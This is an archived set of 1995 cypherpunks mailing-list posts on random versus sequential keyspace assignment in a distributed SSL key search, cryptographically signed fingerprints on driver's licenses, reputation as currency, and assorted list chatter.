is the probability of seeing s hits when m are expected.

s     m      P(s;m)

0     1      1/e, or .368

1     1      1/e, or .368

2     1      .184

etc.

That is, with the "total exhaustion" amount of computation there will be
36.8% of the keyspace left unsearched, simply because nobody's random
segments landed on this fraction of the overall segment.

If twice, three times, four times, etc. as much effort is put into it
(enough to brute force the search space twice, using nonrandom assignment),
then

s     m       P(s;m)

0     2       .135

0     3       .0498

0     4       .0183


For s = 0,  P(s;m) = e ^ -m

Several conclusions can be drawn. Here's what I conclude:

* For opportunistic attacks on keys in challenges, the odds are 95% that a
key will be found with only twice the total effort (or time) using a
totally random method of picking up keyspace to search.

* This is probably good enough. (And if one only wants to be 90% sure of
finding the key, even less effort is needed.)

* And this affects several of the "denial of service" attacks mentioned
here by others, including finding the key but not reporting it (for
whatever reasons), claiming too much keyspace, etc. This is because some of
the same regions are actually being searched two or more times.

* This of course gets rid of the assignment problems.

* If the intent is to show that keys can opportunistically be found, the
random assignment method works pretty well and is "good enough." If, for
some reason, a key _had_ to found, then a more careful, nonrandom
assignment method would be best.

As assignment methods get better, a crossover will occur, and the random
assignment method will lose its advantages.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 13:13:01 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <ac68c16f1c021004dfea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


This thread has more crypto relevance than some might think....

At 7:39 PM 8/29/95, Dave wrote:
>>What possible value could the LEAs get by having your thumbprint digitally
>>encoded on your driver's license?  It's not like the average cop-on-the-beat
>>is qualified to lift a fingerprint and compare it.  Even if he was, how
>>does it benefit that the fingerprint is on the license?
>>
>>This seems silly.
>
>There are device that will electronicly read fingerprints available now.  So
>with such a device, the LEO would know instantly if you were who you said
>that you were.

And it is possible with today's technology to do the following:

-- take a fingerprint

-- scan it, either linearly across some reference line (marked on the
license), or in a full 2D scan

-- have the issuing agency encrypt the resulting waveform (scan), using its
private key

-- print the resulting number on the license

Then, the validity of the license could be verified by:

-- the local checking agent (cop) takes the number printed on the license

-- runs it through the _public key_ of the issuing agency

-- gets back an analog waveform (scan)

-- can compare it directly to the actual fingerprint

This is the same scheme used by the once-extant company "Light Signatures"
as a means of foiling counterfeiters.

(A diagram makes all this much clearer...)

The scan can be done for digitized photos as easily as for fingerprints.
The point is simple: an analog signal of some sort can be "signed" by the
credential-issuing authority such that the signature can be easily checked
in the field, but not easily duplicated or forged.

Note that lottery tickets use a similar scheme. The winning number is
hashed or otherwise encrypted with a private key known only (so the theory
goes...) to the ticket-issuing agencies. This hash is also printed (at
least in some jurisdictions) on the ticket (usually in very small letters).
The winning number, which is announced and posted, cannot be used to print
up a "winning ticket" because the hash/encryption function is not known to
the counterfeiters.

A major player in this market, Scientific Games, has a printing facility
nearby my home.

I don't know if any driver's licenses have anything like this, but the
technology certainly exists, and should be coming pretty soon to all sorts
of documents.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 29 Aug 95 11:48:20 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <199508290556.WAA12070@desiree.teleport.com>
Message-ID: <9508291847.AA12145@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen writes
>They would not have to include an entire thumbprint.  The actual code used
>to verify fingerprints is not very large.  All that would be needed is
>enough information to ID into the "official" records and enough checksum
>type information to prevent alteration/counterfitting.  Using magnetic media
>for this is a bit foolish as it can be changed/destroyed with the stroke of
>a magnet.  I will not say by what means I would think should suit as a
>better encoding scheme because: 1) They are not using it and 2) I do not
>want to give them any ideas.

What possible value could the LEAs get by having your thumbprint digitally
encoded on your driver's license?  It's not like the average cop-on-the-beat
is qualified to lift a fingerprint and compare it.  Even if he was, how
does it benefit that the fingerprint is on the license?

This seems silly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Tue, 29 Aug 95 13:55:08 PDT
To: cypherpunks@toad.com
Subject: Reputation currency
Message-ID: <199508292049.NAA28906@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



From my column...
-Rishab

--====(C) Copyright 1995 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#70, 21/August/1995: Implicit transactions need money you can give away

Information is often given away at no loss to its owners,
while recipients gain, because it can be duplicated. For
some purposes, it could be paid for in money that behaved
in the same way - adding to the recipient's wealth, while
not reducing that of the donor. This money would have to
be quite unusual; but so is the commodity being traded.

Buying and selling knowledge is full of implicit
transactions. One doesn't stop to write a cheque every
time one hears industry gossip, however useful, in the
corridor. More importantly, one doesn't even need to think
about doing so. So much of the knowledge traded in the
'real world' could only be done so informally. Trade is no
less valuable for this - the world runs on the chats with
senior colleagues, the friendly advice over lunch, the
learning and experience gained from working with a client.
Formalizing it all would kill it.

That's as far as we can get with knowledge outside the
distance-eliminating domain of cyberspace. The most
promising aspects of a world with fewer geographical
impediments in the flow of information include the
translation of the gossip in a corridor to an electronic
mailing-list, the ability to be advised by friends never
seen over a virtual lunch, or to chat with a senior
colleague across continents.

But the limitations of geography had advantages. People
now begin to wonder whether they're not being cheated,
when the corridor-mailing-list can have thousands of
people. The narrow confines of office buildings provide a
sense of community, and an assurance that the consumers of
the knowledge traded there are worthy of it, being likely
producers too. But restricting access to electronic
corridors will negate their advantages, of connecting more
minds across space.

The main option being considered these days is not just
overtly tied to economics - it must be, as that's what the
knowledge trade is about - but also tangled with hard
cash, with dollars. This is not only unnecessary, much of
the time, but also harmful.

With the safe assumption of secure international digital
cash transactions in the near future, the hard-currency
solution to the electronic corridor problem would be to
charge every consumer a small amount for everything - a
cent a word, say. This may work with traders in diversity,
the indexers of the world to whom you pay for anything you
need to find. It works rather less well for the traders in
consistency, to whom you would pay much more than a cent a
word for continuous, reliable content.

But for those who lurk in the electronic corridors of the
infosphere - and all the implicit cooperatives that form
between individual contributors to cyberspace's live,
people resources - the hard cash model is useless. Among
others, there is the question of who takes the money. The
Department of Corridors? The Treasurer of Electronic
Mailing Lists? It certainly wouldn't be fair to pay just
the individual author of the particular piece you read and
found useful, as it built upon the unpaid work of others.
After all, the informal nature of these gatherings of
minds is for a reason. They, or at least the active
participants, contribute not for cash but in return for
the contributions of others. They only take exception to
the one-way consumption by stray, if numerous, visitors.

The alternative to hard cash in these implicit
transactions in cyberspace is the equally implicit
currency of the real world. The currency that is used
almost solely in the trading of knowledge and which, like
knowledge, extracts no direct cost to the buyer at the
seller's gain. A currency that can be paid equally to
corridors full of industry gossip as to colleagues who
throng there. Indeed, a currency that is, and is traded
like, information itself: reputation.

Reputation may not, at first glance, resemble money. But
it is the implicit reward of good products, and their
producers. It certainly adds to - or subtracts from - the
worth of those who receive it. And it is the ultimate free
market currency. Traded as a commodity like other data,
reputation is based on, and influences in turn, the
average of 'prices' set by individual consumers - what
individuals think of a producer. Reputation encourages
improved production as much as, or more than, cash does -
at least in the informal knowledge trade. And reputation
will be a very important aspect of the knowledge economy,
with the increasing anomie of cyberspace as e-mail
replaces firm handshakes.

There are, of course, problems with transporting the
informal reputations outside cyberspace to reputation
systems within it. But work does continue on the necessary
technologies. This progresses at a slower pace than that
on automatic cent-a-word payment systems, because
developers don't realize the importance of informality in
the information age. This will have to change - the
knowledge economy is actually a people economy, and its
most common currency should reflect that.

Rishab Aiyer Ghosh (rishab@dxm.org) is the editor and publisher
of The Indian Techonomist.

--====(C) Copyright 1995 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@arbornet.org)
--==================================================================--


----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Tue, 29 Aug 95 10:38:03 PDT
To: cypherpunks@toad.com
Subject: Probability calculations
Message-ID: <9508291203.AA24840@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Scott Brickner <sjb@austin.ibm.com>
>% k-space         random        sequential      percent
>searched          method          method        difference
[...]
>99.9             115892899       16760439       591

But you fail to take into account the probability that the search will
have to go that far.


This is how I compute the expected cost of the random search.

The probability of finding the key upon searching the k-th segment is:

                  k-1
  p(k) = (1 - 1/n)    . 1/n

The expected cost is the sum of all possible costs, weighted by their
probability:
    ___                 ___
    \                   \              i-1
e =  >  i p(i)    = 1/n  >  i (1 - 1/n)
    /__                 /__
    i = 1..oo           i = 1..oo

        ___        ___
        \          \             i-1
  = 1/n  >          >   (1 - 1/n)
        /__        /__
        i = 1..oo  j = 1..i

        ___
        \            i-1
  = 1/n  >  (1 - 1/n)
        /__
        {(i,j) | 1 <= j <= i}

        ___        ___
        \          \            i-1
  = 1/n  >          >  (1 - 1/n)
        /__        /__
        j = 1..oo  i = j..oo

        ___                 ___
        \             j-1   \             i
  = 1/n  >   (1 - 1/n)   .   >   (1 - 1/n)
        /__                 /__
        j = 1..oo           i = 0..oo
       \_______________/   \_______________/
               n                   n

e = n

This means that if you do many random searches (with a good RNG), the
average cost of one search must be n.

Any errors in the above ?

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Tue, 29 Aug 95 11:58:05 PDT
To: cypherpunks@toad.com
Subject: Searchnet
Message-ID: <Pine.3.89.9508291310.S13049-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain



	Some time ago, I posted a reply to an allegation that the 
Spotlight was a Klan paper. 

	Of course, it is more Liberty Lobby/CIA, with Bo Gritz on the Board.

	The point of this post is that those who want to know 
what is up with the Spotlight need to subscribe to Searchnet, which 
covers all the information of like sort. There was also a wonderful post 
recently hailing hackers as the ones who are most likely to prevent 
government sponsored crypto-terror censorship.

	Those who would like the post, speak up.

	Those who want to subscribe to Searchnet, likewise.

	Hope this does not get in the way of PGP implementation.

	Onwards, Lee

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Tue, 29 Aug 95 14:56:18 PDT
To: don@cs.byu.edu
Subject: Re: Sendmail Bugs
In-Reply-To: <199508290733.BAA01311@wero>
Message-ID: <Pine.BSD.3.91.950829145429.17990A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Aug 1995 don@cs.byu.edu wrote:

> There is a document on alt.security which describes exploitable sendmail
> bugs. The reference is <809544856snz@hacknet.demon.co.uk>
> I saved a copy in case anyone would like one.

Would you please email me a copy of that doc-file?

I would find it very interesting... :-^)

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 29 Aug 95 14:01:35 PDT
To: cypherpunks@toad.com
Subject: SSL search attacks
Message-ID: <199508292102.PAA01897@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Scott Brickner <sjb@austin.ibm.com>

>We've identified several forms of "real-world retaliation:"
>
>1) "Result hoarding" - failure to report a found key
>2) "Segment hoarding" - requesting more segments than one can hope to search
>3) Denial of service - preventing access to the server

>The "random search" method eliminates all three of these at about 37%
>higher cost in search time, on the average.  I submit that if we
>*really* were trying to break something important, we could design a
>system which eliminated the first two and adequately limited the third,
>but at *much* less cost.
>
>The problems in the current system were to be expected of a first
>attempt.  In the future:  Only the server assigns segments, only the
>assignee may report the status of a segment, and after all segments are
>NAKed we know condition 1 has occurred, at which time we start over,
>but never assign the same segment to the same searcher.  Limit the
>number of segments which may be outstanding with one searcher at one
>time as a function of work rate.  Deploy redundant servers.

BEAAAT STATE! Push 'em back.. WAAAAAAY BAAAACK. 
(relevant comments follow)


From: tcmay@got.net (Timothy C. May)

>An interesting question: Is it a valid approach for J. Random User to
>"claim" some chunk of keyspace to search?
>
>If the "reward" of finding the gold buried in the keyspace (a key that
>meets the  challenge) is high and the cost of claiming the keyspace is low
>(or nil), then game theory tells us that some folks will be tempted to
>claim a bigger chunk of keyspace than they can possibly process.
>
>What can be done to reduce this effect?


In regard to both messages, I think that with sequentially allocated
keyspace an attacker who knows the real key would have trouble getting the
right segment unless s/he grabbed a big enough piece. If the search is
restarted, we know something's up. Ensuring that nobody gets to search
keyspace they searched before would be one improvement. A random (instead
of sequential) allocation _by the keyserver_ (out of unallocated 
piecemeal segments) would also take some work to implement. 


>On the negative side, ostracize or punish those who bite off more than they
>can chew. This approach is fraught with dangers.

If the search wraps around to catch the UNACK'ed pieces, this type of
oversight will only slow down the actual discovery of the key. Failure
to report a found key, though, is a bit different. I would not be opposed
to having my program report possible hits, with the server being what
discovers if I've found it or not.

>On the positive side, let everyone simply attack the keyspace as they see
>fit, picking random parts to attack. This should not be "worse" than a
>factor of several from a "perfectly coordinated" attack. (I haven't spent
>time calculating this, but my intuition is that a random attack, with
>overlapping keyspace, is not a lot less efficiently attacked than
>attempting to arrange for no overlaps...just based on my mental picture of
>dropping line segments randomly on some interval and figuring coverage of
>the line segment.)

Why not have a random backup-mode, in case someone does mount a denial of
service attack. Or imploy a combination of the two modes. The machines
running brloop can search sequentially (out of the middle 50%?) and the
machines not connected search randomly (out of the outside 50%?). Or,
venturing further into the I-wonder-who's-gonna-code-this world, log the
random searches for possible conversion to an exhaustive search later. 

It would be nice to be able to hit the emergency button and switch to
random mode, but currently I don't think there's a need to actually
use it.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEN/U8La+QKZS485AQHNcgL+ItlNLYcsIjjlQPQJBxgts66GXPMs3ijb
QIcqiAbrg4cq7F9xWNRvZa9LTvw75UUM1+PmItGkSUuqOqvJ9VkzaUp8/Sf5zuDs
5XTlJLVhYa7qQzY4Ov4a3k0ora0SPvKh
=wyzo
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Tue, 29 Aug 95 12:50:15 PDT
To: WOOD@VAX2.ROCKHURST.EDU
Subject: Re: Joel's RSA-t's
In-Reply-To: <01HUN7RYOMZM003M4J@VAX2.ROCKHURST.EDU>
Message-ID: <m0snW0o-0001puC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


WOOD@VAX2.ROCKHURST.EDU enscribed thusly:
> 
> > 
> > On Josh Osborne's RSA-perl T-shirt venture,
> >
> > I don't know about the rest of you, but I didn't realise from Joel's
> > last post to the list that he was taking orders for then.  I guess
> > that's as close to an announcement as he's going to make.  I just
> > checked his netstuff web page, and he's taking orders now!
> > 
> > Check out:
> > 
> > 	http://www.danger.com/ad-perl.html
> > 
> > (this is referenced from Joel's netstuff page under currently
> > available items:
> > 
> > 	http://www.danger.com/netstuff.html
> > )
> > 
> > From the Joel's web page:
> > 
> > > DEADLINE TO ORDER: All orders for these shirts must be postmarked by
> > > June 1, 1995.
> > 
> > Also my page on perl-rsa is:
> > 
> > 	http://dcs.ex.ac.uk/~aba/perl-rsa.html
> > 
> > I'll be away from my mail for the rest of this week, so maybe someone
> > can post this info to all the crypto groups...


> Has anyone received a shirt from Joel?  Or is he ripping people off?

> Many thanks,

	Don't know about Joel.  Might have heard one complaint over on
alt.security.pgp a month or so ago.  I just got 7 perl-rsa T-Shirts
from "wepinsto" (http://colossus.net/wepinsto/).  These were for myself,
my youngest son (16), my brother, and four friends who asked me to
order for them.  They look great!  Almost as great as the looks you
GET when people see them wondering "what the *&*r!".

	I just have one problem though...  If these things are classified
as a "munition" aka a "weapon" by da fed's how does that affect us down
here in good old Georgia where our legislature has passed a law making
it a crime to be in posession of a weapon anywhere within a hundred yards
or so of school property.  This is rather relevant for my teenager!
The school councilers looked real confused and said "Dah...  We don't
know!"  I'm suppose to talk to the man "in charge of discipline" for an
opinion on this.  As I told someone else on another mailing list, this
sounds REAL stupid but all it takes is one idiot (and we have a plentiful
supply of idiots down here in Georgia) with a wild hair and students
get expelled for silverware sitting on a car seat, tools such as tire
irons (no they weren't threating someone with one), or cultural and
cerimonial artifacts.

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 29 Aug 95 14:14:35 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <ac67e8b60f021004f508@[205.199.118.202]>
Message-ID: <p83QwkkAsimJ084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 28 Aug 1995, tcmay@got.net (Timothy C. May) wrote:

> At 4:48 PM 8/28/95, Jason L Tibbitts III wrote:
> >Believe it or not, something like this is being used (or is being prepared
> >for use) in breast implants.  An article in the Houston (silicone city)
> >Chronicle about a month ago (sorry, I can't produce a more exact reference)
> >stated that new soybean oil breast implants are being manufactured to
> >accept an identification device to track information on the patient and the
> >implanting doctor.

> Big Brother? Big Sister? Naw, it's "Big Tits."

Or "Twin PKCS."  This may explain Anne Taylor Fleming's apparent confusion
on a recent MacNeil/Lehrer segment -- she repeatedly referred to Cliff
Stoll's latest excoriation of cyberspace as _Silicone Snake Oil_, remember?

Maybe she's heard rumors about the Justice Dept. investigating an
impending Microsoft-DuPont merger to corner the market...

Sorry, but it's slow with so many folks in Aspen or Santa Barbara.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Tue, 29 Aug 95 16:18:07 PDT
To: The Gate <gate@id.WING.NET>
Subject: Re: Searchnet
In-Reply-To: <Pine.3.89.9508291310.S13049-0100000@dialin1.wing.net>
Message-ID: <Pine.SUN.3.91.950829150614.13330C@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Aug 1995, The Gate wrote:

> 
> 	Some time ago, I posted a reply to an allegation that the 
> Spotlight was a Klan paper. 
> 
> 	Of course, it is more Liberty Lobby/CIA

Oh boy, my two favorites: (1) racist, anti-semitic scum and (2)
international mass-murderer-trainers and baby-torturers. 

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 29 Aug 95 12:28:05 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <199508291905.MAA04950@desiree.teleport.com>
Message-ID: <199508291927.PAA20067@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



The Florida drivers license conversation has gotten a bit afield of
cryptography.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 29 Aug 95 14:01:51 PDT
To: Dave <d-jones@ix.netcom.com>
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <199508291933.MAA22876@ix3.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.950829165337.3285A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


And somebody, Science Applications International Corp. I think, is 
designing an in-car fingerprint reader / database query-er for cops.  So 
they can check your bona fides on the road sides.

bd


On Tue, 29 Aug 1995, Dave wrote:

> 
> >What possible value could the LEAs get by having your thumbprint digitally
> >encoded on your driver's license?  It's not like the average cop-on-the-beat
> >is qualified to lift a fingerprint and compare it.  Even if he was, how
> >does it benefit that the fingerprint is on the license?
> >
> >This seems silly.
> 
> There are device that will electronicly read fingerprints available now.  So
> with such a device, the LEO would know instantly if you were who you said
> that you were.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick Lear <plear@pimlico.ekrl.com>
Date: Tue, 29 Aug 95 17:49:10 PDT
To: cypherpunks@toad.com
Subject: Announcing SecureDrive 2.4 (fwd)
Message-ID: <Pine.SUN.3.91.950829174625.7812B-100000@pimlico>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have any experience with the SecureDrive program and if so 
can you make any comments about it?

I've been looking for something like this for a while and I'd also like 
to know which other programs compare / are better / are worse if any.

Thanks for any input ...

Patrick Lear, Sui Juris




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 29 Aug 95 17:46:25 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <v0213050aac69747dc574@[157.22.240.11]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:15 PM 8/29/95, Mark wrote:
>>What possible value could the LEAs get by having your thumbprint digitally
>>encoded on your driver's license?  It's not like the average cop-on-the-beat
>>is qualified to lift a fingerprint and compare it.  Even if he was, how
>>does it benefit that the fingerprint is on the license?
>
>Here it is possible to walk into a suitably equipped police station, put your
>fingertips on a sensor pad and a few seconds, if records exist, have the appear
>on the computer screen. Extrapolating this it isnt a big step for a patrol
>car, already equipped with a packet radio link to HQ and a data terminal,
>scan in your fingerprint and check it. If the system was offline they could
>easily take your rpint and compare it to that on your license. It's just a
>little more proof that the license is linked to you.
>

My only question though is why help them create more records about the
average citizen?

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick Lear <plear@pimlico.ekrl.com>
Date: Tue, 29 Aug 95 17:51:56 PDT
To: cypherpunks@toad.com
Subject: Locked out of Quicken - HELP!
Message-ID: <Pine.SUN.3.91.950829175058.7812C-100000@pimlico>
MIME-Version: 1.0
Content-Type: text/plain



I recently created a new file in Quicken and used a password to protect 
it from prying eyes (I know ... it isn't very strong encryption ... and I 
hope it isn't) but now I can't remember the @#$%^!!@#$#@$% password.

Does anyone have any suggestions regarding how to break in?

Thanks,

Patrick Lear, Sui Juris




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 29 Aug 95 22:11:34 PDT
To: bdolan@use.usit.net (Brad Dolan)
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <Pine.SOL.3.91.950829165337.3285A-100000@use.usit.net>
Message-ID: <950829.180249.8r3.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, bdolan@use.usit.net writes:

> And somebody, Science Applications International Corp. I think, is 
> designing an in-car fingerprint reader / database query-er for cops.  So 
> they can check your bona fides on the road sides.

The company I know definitely is on this is Digital Biometrics, Inc,
located in Minnetonka, Minnesota.  Their device is called a SQUID (and
no, I don't know what the acronym stands for).  About 8" long and
roughly 2.5" squarish, it has a lens in front where the subject's thumb
is placed, and scans the lens with a laser.  It's not quite in
production yet, although prototypes are under construction.  I happen to
work for the company doing the machining work.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMEOdVhvikii9febJAQEu+QQAlDHh+rt+iyJ3Yi41B1InvtECalLA2spR
Kl15Z/Fr2/WciRX7/VjHb2WQYxJ98psZlL37QeAWYDZ/PmfaCaknGd6rTgSyl3Vl
itMSdfxB6eMpEAcJUQMPzB083i2MXDqdzAMBjWaw6FrYBKJ9+Rx12SZXz7UAFEz9
8nU5IBZ0Im0=
=B9lj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alano@teleport.com)
Date: Wed, 20 Sep 95 16:25:31 PDT
To: cypherpunks@toad.com
Subject: RE: FLORIDA DRIVERS PERMITS AND A HELLO
Message-ID: <9509201546185279@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 29 Aug 1995 12:06:42 -0700
To: cypherpunks@toad.com
From: Alan Olsen <alano@teleport.com>
Subject: Re: Florida Drivers Permits and a Hello 

At 01:47 PM 8/29/95 -0500, you wrote:
>Alan Olsen writes
>>They would not have to include an entire thumbprint.  The actual code used
>>to verify fingerprints is not very large.  All that would be needed is
>>enough information to ID into the "official" records and enough checksum
>>type information to prevent alteration/counterfitting.  Using magnetic media
>>for this is a bit foolish as it can be changed/destroyed with the stroke of
>>a magnet.  I will not say by what means I would think should suit as a
>>better encoding scheme because: 1) They are not using it and 2) I do not
>>want to give them any ideas.
>
>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?
>
>This seems silly.

I was pointing out that it was possible.  I was not trying to make the point
that there was any *USE* for such a thing.  (Evidently some ID cards now
carry such prints. California does, if memory serves me correctly.)

Just because something is silly does not mean it will not be tried by
someone in law enforcement.  In fact, there seems to be a corelation between
silly acts and law enforcement...  (Or at least those making the rules about
law enforcement.)  And if you think it cannot get any worse, Pete "I want to
seal the borders" Wilson has announced he is running for president.  We will
be getting a large number of silly laws and pronouncements if the American
people are stupid enough to elect him to high office.

>
>
|            Visualize whirled keys!              | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites    | Disclaimer:          |
|all mankind free in one-key-stenography-privacy!"| Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Tue, 29 Aug 95 11:33:19 PDT
To: WOOD@VAX2.ROCKHURST.EDU
